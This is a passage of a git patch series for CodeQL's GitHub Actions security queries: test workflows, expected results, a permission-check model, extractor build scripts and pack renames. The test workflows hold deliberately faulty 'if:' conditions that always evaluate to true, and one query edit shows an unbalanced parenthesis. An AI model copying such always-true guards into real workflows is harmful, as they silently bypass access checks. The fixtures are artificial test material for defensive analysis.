+ +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 97% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index 4ed45ff973e7..bbbcc5aaa791 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -91,7 +91,7 @@ jobs: if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml new file mode 100644 index 000000000000..8b863037e29b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: github.actor == "foo" + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ github.actor == "foo" }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ github.actor == "foo" }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + github.actor == "foo" || + 3 == 4 }} + - name: Test 9 + if: '${{ github.actor == "foo" }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{ github.actor == 111 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ github.actor == 111 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ github.actor == 111 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + github.actor == "foo" || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.actor }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ github.actor }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.actor == 'foo' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected deleted file mode 100644 index d4c16131cc26..000000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ /dev/null @@ -1,11 +0,0 @@ -| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | -| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | -| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | -| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | -| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | -| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | -| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | -| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | -| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref deleted file mode 100644 index 01235fb6a202..000000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-571/ExpressionIsAlwaysTrue.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected new file mode 100644 index 000000000000..2ef457d9e01a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected @@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 000000000000..823f802a70f2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 000000000000..c853603377cf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected @@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 000000000000..f12135bd1b88 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql From 4f62573d1778a07a4dd8ff86510ca66ba6f24c15 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:11:52 +0100 Subject: [PATCH 663/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d34dad6665c8..a7df1c400bfc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.84 +version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 007c2ebbe95d..96ba98407850 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.84 +version: 0.1.85 groups: [actions, queries] suites: codeql-suites extractor: javascript From ae6856ab5a2d1b775e16859b3f0146b6496578d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 14:44:13 +0100 Subject: [PATCH 664/707] models: add new control check model --- ql/lib/codeql/actions/security/ControlChecks.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index a24fd44b8650..244c04310d6d 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -267,6 +267,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { + this.getCallee() = "actions-cool/check-user-permission" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("require") = ["write", "admin"] + ) + or this.getCallee() = "sushichop/action-repository-permission" and this.getArgument("required-permission") = ["write", "admin"] or From 5bf02e73ea2ab7cc8e12ef8fd784df1a183f007a Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 4 Nov 2024 11:30:29 -0500 Subject: [PATCH 665/707] Update ql/src/Security/CWE-829/UnpinnedActionsTag.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alvaro Muñoz --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b5..95498d6be5ab 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + repo.matches(["actions", "github", "advanced-security"] + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From 686e30a52a65d6a83e532cd6c8ece34849938ad3 Mon Sep 17 00:00:00 2001 From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Wed, 6 Nov 2024 20:20:26 +0000 Subject: [PATCH 666/707] add qlhelp --- .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md new file mode 100644 index 000000000000..21a56e8d84d6 --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md @@ -0,0 +1,13 @@ +# Unneccesary use of advanced configuration + +## Description + +The CodeQL workflow does not use any custom settings and could be simplified by switching to the CodeQL default setup. + +## Recommendations + +If there is no reason to have a custom configuration switch to the CodeQL default setup. + +## References + +- [GitHub Docs: Configuring Default Setup for a repository](https://docs.github.com/en/code-security/code-scanning/enabling-code-scanning/configuring-default-setup-for-code-scanning#configuring-default-setup-for-a-repository) \ No newline at end of file From 99a49fb27fac14f93c8fb6848ebbbef8a4c6e799 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 10:43:05 -0500 Subject: [PATCH 667/707] Move packs to `codeql` org --- BUILD.bazel | 20 ++++++++++++++ extractor/BUILD.bazel | 10 +++++++ extractor/codeql-extractor.yml | 44 ++++++++++++++++++++++++++++++ extractor/tools/autobuild-impl.ps1 | 40 +++++++++++++++++++++++++++ extractor/tools/autobuild.cmd | 3 ++ extractor/tools/autobuild.sh | 39 ++++++++++++++++++++++++++ ql/lib/qlpack.yml | 8 +++--- ql/src/codeql-pack.lock.yml | 22 +++++++++++---- ql/src/qlpack.yml | 6 ++-- ql/test/qlpack.yml | 10 +++---- 10 files changed, 184 insertions(+), 18 deletions(-) create mode 100644 BUILD.bazel create mode 100644 extractor/BUILD.bazel create mode 100644 extractor/codeql-extractor.yml create mode 100644 extractor/tools/autobuild-impl.ps1 create mode 100644 extractor/tools/autobuild.cmd create mode 100644 extractor/tools/autobuild.sh diff --git a/BUILD.bazel b/BUILD.bazel new file mode 100644 index 000000000000..643d40897185 --- /dev/null +++ b/BUILD.bazel @@ -0,0 +1,20 @@ +load("//misc/bazel:pkg.bzl", "codeql_pack") + +package(default_visibility = ["//visibility:public"]) + +[ + codeql_pack( + name = "-".join(parts), + srcs = [ + "//actions/extractor", + ], + pack_prefix = "/".join(parts), + ) + for parts in ( + [ + "experimental", + "actions", + ], + ["actions"], + ) +] diff --git a/extractor/BUILD.bazel b/extractor/BUILD.bazel new file mode 100644 index 000000000000..e6780e10db2a --- /dev/null +++ b/extractor/BUILD.bazel @@ -0,0 +1,10 @@ +load("//misc/bazel:pkg.bzl", "codeql_pkg_files", "strip_prefix") + +codeql_pkg_files( + name = "extractor", + srcs = [ + "codeql-extractor.yml", + ] + glob(["tools/**"]), + strip_prefix = strip_prefix.from_pkg(), + visibility = ["//actions:__pkg__"], +) diff --git a/extractor/codeql-extractor.yml b/extractor/codeql-extractor.yml new file mode 100644 index 000000000000..ab7374910054 --- /dev/null +++ b/extractor/codeql-extractor.yml @@ -0,0 +1,44 @@ +name: "actions" +aliases: [] +display_name: "GitHub Actions" +version: 0.0.1 +column_kind: "utf16" +unicode_newlines: true +build_modes: + - none +file_coverage_languages: [] +github_api_languages: [] +scc_languages: [] +file_types: + - name: workflow + display_name: GitHub Actions workflow files + extensions: + - .yml + - .yaml +forwarded_extractor_name: javascript +options: + trap: + title: TRAP options + description: Options about how the extractor handles TRAP files + type: object + visibility: 3 + properties: + cache: + title: TRAP cache options + description: Options about how the extractor handles its TRAP cache + type: object + properties: + dir: + title: TRAP cache directory + description: The directory of the TRAP cache to use + type: string + bound: + title: TRAP cache bound + description: A soft limit (in MB) on the size of the TRAP cache + type: string + pattern: "[0-9]+" + write: + title: TRAP cache writeable + description: Whether to write to the TRAP cache as well as reading it + type: string + pattern: "(true|TRUE|false|FALSE)" diff --git a/extractor/tools/autobuild-impl.ps1 b/extractor/tools/autobuild-impl.ps1 new file mode 100644 index 000000000000..6ae433f2599c --- /dev/null +++ b/extractor/tools/autobuild-impl.ps1 @@ -0,0 +1,40 @@ +if (($null -ne $env:LGTM_INDEX_INCLUDE) -or ($null -ne $env:LGTM_INDEX_EXCLUDE) -or ($null -ne $env:LGTM_INDEX_FILTERS)) { + Write-Output 'Path filters set. Passing them through to the JavaScript extractor.' +} else { + Write-Output 'No path filters set. Using the default filters.' + $DefaultPathFilters = @( + 'exclude:**/*', + 'include:.github/workflows/**/*.yml', + 'include:.github/workflows/**/*.yaml', + 'include:**/action.yml', + 'include:**/action.yaml' + ) + + $env:LGTM_INDEX_FILTERS = $DefaultPathFilters -join "`n" +} + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +$CodeQL = Join-Path $env:CODEQL_DIST 'codeql.exe' +$env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT = &$CodeQL resolve extractor --language javascript +if ($LASTEXITCODE -ne 0) { + throw 'Failed to resolve JavaScript extractor.' +} + +Write-Output "Found JavaScript extractor at '${env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder. +$JavaScriptAutoBuild = Join-Path $env:CODEQL_EXTRACTOR_JAVASCRIPT_ROOT 'tools\autobuild.cmd' +Write-Output "Running JavaScript autobuilder at '${JavaScriptAutoBuild}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +$env:CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_LOG_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR = $env:CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR +$env:CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE = $env:CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE + +&$JavaScriptAutoBuild +if ($LASTEXITCODE -ne 0) { + throw "JavaScript autobuilder failed." +} diff --git a/extractor/tools/autobuild.cmd b/extractor/tools/autobuild.cmd new file mode 100644 index 000000000000..ff5ca89d94a4 --- /dev/null +++ b/extractor/tools/autobuild.cmd @@ -0,0 +1,3 @@ +@echo off +rem All of the work is done in the PowerShell script +powershell.exe %~dp0autobuild-impl.ps1 diff --git a/extractor/tools/autobuild.sh b/extractor/tools/autobuild.sh new file mode 100644 index 000000000000..57adbf96279d --- /dev/null +++ b/extractor/tools/autobuild.sh @@ -0,0 +1,39 @@ +#!/bin/sh + +set -eu + +DEFAULT_PATH_FILTERS=$(cat << END +exclude:**/* +include:.github/workflows/**/*.yml +include:.github/workflows/**/*.yaml +include:**/action.yml +include:**/action.yaml +END +) + +if [ -n "${LGTM_INDEX_INCLUDE:-}" ] || [ -n "${LGTM_INDEX_EXCLUDE:-}" ] || [ -n "${LGTM_INDEX_FILTERS:-}" ] ; then + echo "Path filters set. Passing them through to the JavaScript extractor." +else + echo "No path filters set. Using the default filters." + LGTM_INDEX_FILTERS="${DEFAULT_PATH_FILTERS}" + export LGTM_INDEX_FILTERS +fi + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$($CODEQL_DIST/codeql resolve extractor --language javascript)" +export CODEQL_EXTRACTOR_JAVASCRIPT_ROOT + +echo "Found JavaScript extractor at '${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder +JAVASCRIPT_AUTO_BUILD="${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}/tools/autobuild.sh" +echo "Running JavaScript autobuilder at '${JAVASCRIPT_AUTO_BUILD}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +env CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR="${CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR="${CODEQL_EXTRACTOR_ACTIONS_LOG_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR="${CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR="${CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR="${CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE="${CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE}" \ + ${JAVASCRIPT_AUTO_BUILD} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bfc..823e6a76cbc2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,16 +1,16 @@ --- library: true warnOnImplicitThis: true -name: github/actions-all +name: codeql/actions-all version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 -extractor: javascript -dbscheme: semmlecode.javascript.dbscheme -groups: javascript + codeql/javascript-all: ^2.0.2 +extractor: actions +groups: actions dataExtensions: - ext/manual/*.model.yml - ext/generated/**/*.model.yml diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 21e0b8bb0e91..c4ef87bc2512 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba98407850..c907bbab1d0a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,11 +1,11 @@ --- library: false -name: github/actions-queries +name: codeql/actions-queries version: 0.1.85 groups: [actions, queries] suites: codeql-suites -extractor: javascript +extractor: actions defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - github/actions-all: ${workspace} + codeql/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 77e25d8e419c..893532481eca 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,10 +1,10 @@ --- -name: github/actions-tests -groups: [javascript, test] +name: codeql/actions-tests +groups: [codeql, test] dependencies: - github/actions-all: ${workspace} - github/actions-queries: ${workspace} -extractor: javascript + codeql/actions-all: ${workspace} + codeql/actions-queries: ${workspace} +extractor: actions tests: . warnOnImplicitThis: true From b2100d00aa091c9cbda89803f5d3e216ed2d4cfc Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:34 -0500 Subject: [PATCH 668/707] Add `security-and-quality` suite --- ql/src/codeql-suites/actions-security-and-quality.qls | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/src/codeql-suites/actions-security-and-quality.qls diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/ql/src/codeql-suites/actions-security-and-quality.qls new file mode 100644 index 000000000000..ef332acb872c --- /dev/null +++ b/ql/src/codeql-suites/actions-security-and-quality.qls @@ -0,0 +1,11 @@ +- description: Security-and-quality queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + From 1f3bab2b65934888d9b6323df6f1848003222671 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:52 -0500 Subject: [PATCH 669/707] Move data extensions to use `codeql` org --- ql/lib/codeql-pack.lock.yml | 22 ++++++++++++++----- .../ext/config/argument_injection_sinks.yml | 2 +- ql/lib/ext/config/context_event_map.yml | 2 +- .../config/externally_triggereable_events.yml | 2 +- ql/lib/ext/config/poisonable_steps.yml | 6 ++--- .../ext/config/untrusted_event_properties.yml | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 2 +- ql/lib/ext/config/untrusted_git_command.yml | 2 +- ql/lib/ext/config/vulnerable_actions.yml | 2 +- ql/lib/ext/config/workflow_runtime_data.yml | 4 ++-- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 